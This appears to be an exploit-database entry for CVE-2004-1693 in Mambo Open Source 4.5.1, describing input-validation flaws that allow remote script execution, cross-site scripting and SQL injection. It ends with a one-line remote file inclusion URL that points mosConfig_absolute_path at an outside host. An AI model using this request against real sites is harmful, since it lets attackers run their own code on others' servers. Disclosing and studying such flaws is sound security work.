Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution
Author: Joxean Koret
type: webapps
platform: php
port:
date_added: 2004-09-20
date_updated: 2013-03-06
verified: 1
codes: CVE-2004-1693;OSVDB-10180
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/11220/info
Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer, to carry out cross-site scripting attacks, and to make SLQ injection attacks against the vulnerable application.
http://www.example.com/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://www.example.org/